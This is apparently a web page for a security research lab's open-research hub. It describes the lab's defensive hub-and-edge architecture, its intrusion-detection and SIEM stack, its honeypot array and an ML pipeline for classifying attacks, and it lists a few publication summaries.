RESEARCH HUB

Open
Research

Methodologies, Data, & Publications

Our commitment to radical transparency means sharing our findings. Explore our peer-reviewed articles, operational datasets from our honeypot arrays, and detailed documentation on our AI and defense architectures.

Read Publications View Infrastructure

0 Vulnerabilities Found

0 CVEs Reported

0% Detection Rate

<15min Response Time

Publications

Published findings.

Paper // AI/ML

Optimizing Local LLM Inference for Sensitive Research Data

A comparative study on running Llama 3.2 and Mistral locally, outlining architectural requirements for zero-data-leakage environments.

Read Paper →

Report // Security

Deception Architectures: 6-Month Attack Pattern Analysis

Analysis of 847+ unique vulnerabilities captured via our honeypot array, resulting in 24 responsible CVE disclosures.

Read Report →

Case Study // Infrastructure

Autonomous Threat Detection via Local ML Pipelines

How we built a 5-stage ML pipeline using open-weight models to autonomously classify and mitigate zero-day exploit attempts.

Read Case Study →

View All Articles

Methodology & Infrastructure

Hub-Satellite Architecture.

A two-node defense model. The Hub runs AI workloads, SIEM correlation, and automated response. The Satellite operates at the edge — IDS/IPS, network analysis, and deception systems act as the first line of defense. Connected through encrypted mesh VPN.

Primary Node — Hub

HAL9000

RoleAI Lab · SIEM · Automation
Containers42+
GPUNVIDIA RTX
StackWazuh · ML Engine · n8n
OSUbuntu 24.04 LTS

Encrypted VPN Mesh

Log Sync · 5min

Edge Node — Satellite

SENTINEL

RoleEdge Security · DNS · IDS
Services11 Active
IDS Rules105,000+
StackSuricata · Zeek · CrowdSec
Honeypots3 Systems

Defense-in-Depth

Six-layer security stack.

IDS / IPS

Suricata

Network intrusion detection with 105,000+ rules. Real-time packet inspection, protocol anomaly detection, and automatic threat blocking at wire speed.

Network Analysis

Zeek 8.0

Deep protocol analysis and traffic logging. Extracts metadata from every connection — SSH fingerprints, DNS queries, HTTP headers, TLS certificates, and anomalous behaviors.

SIEM

Wazuh

Centralized security event management. Correlates alerts from all sources, file integrity monitoring, rootkit detection, and compliance auditing with severity-based escalation.

Threat Intelligence

CrowdSec

Collaborative threat intelligence with global IP reputation database. Community-driven block lists, behavior-based detection scenarios, and automated ban decisions.

Deception Systems

Honeypot Array

Three specialized honeypots capturing attack patterns across SSH, Telnet, FTP, SMB, MSSQL, HTTP, SMTP, POP3, IMAP, and PostgreSQL protocols.

ML Defense Engine

Adaptive Defense

Self-learning anomaly detection. Processes data from all security layers — honeypot interactions, IDS alerts, network flows — to identify emerging attack patterns and automate response.

Self-Learning Architecture

Adaptive ML defense pipeline.

Security logs from honeypots, IDS, and network analysis flow through a machine learning pipeline that continuously learns attacker behavior patterns and adapts defenses automatically.

Ingest

Cowrie, Dionaea, Heralding honeypot logs + Suricata alerts + Zeek network flows synced every 5 minutes from edge node

→

Extract

Feature extraction — source IPs, attack vectors, credential patterns, payload signatures, protocol anomalies, session behaviors

→

Classify

ML model classifies threats — brute force, exploit attempts, reconnaissance, data exfiltration, lateral movement, C2 communication

→

Correlate

Cross-reference with Wazuh SIEM events, CrowdSec global intel, and historical patterns to confirm threats and reduce false positives

→

Respond

Automated actions — IP bans via CrowdSec + Fail2ban, rule updates, real-time notifications, and model retraining with new threat data

Deception Layer

Honeypot array.

Three specialized deception systems emulate vulnerable services to capture real attack patterns, credential stuffing lists, and malware payloads across multiple protocols.

SSH · Telnet

Cowrie

Medium-interaction SSH/Telnet honeypot. Records login attempts, shell commands executed by attackers, and file downloads in a sandboxed environment.

CapturesCredentials · Commands · Sessions

FTP · SMB · MSSQL · MySQL

Dionaea

Low-interaction honeypot for network services. Captures malware samples, exploit payloads, and shellcode targeting database and file sharing protocols.

CapturesMalware · Exploits · Payloads

HTTP · SMTP · POP3 · IMAP · PostgreSQL

Heralding

Credential capture honeypot across web and email protocols. Logs authentication attempts with full session metadata for threat intelligence feeds.

CapturesCredentials · Protocols · IPs

Results & Datasets

Threat feed.

Adaptive Defense Engine — Real-time Output

Monitoring

Stay ahead of
the threats.

We collaborate with researchers, institutions, and organizations to advance the field of autonomous defense.

Collaborate With Us Read Our Research

Open Research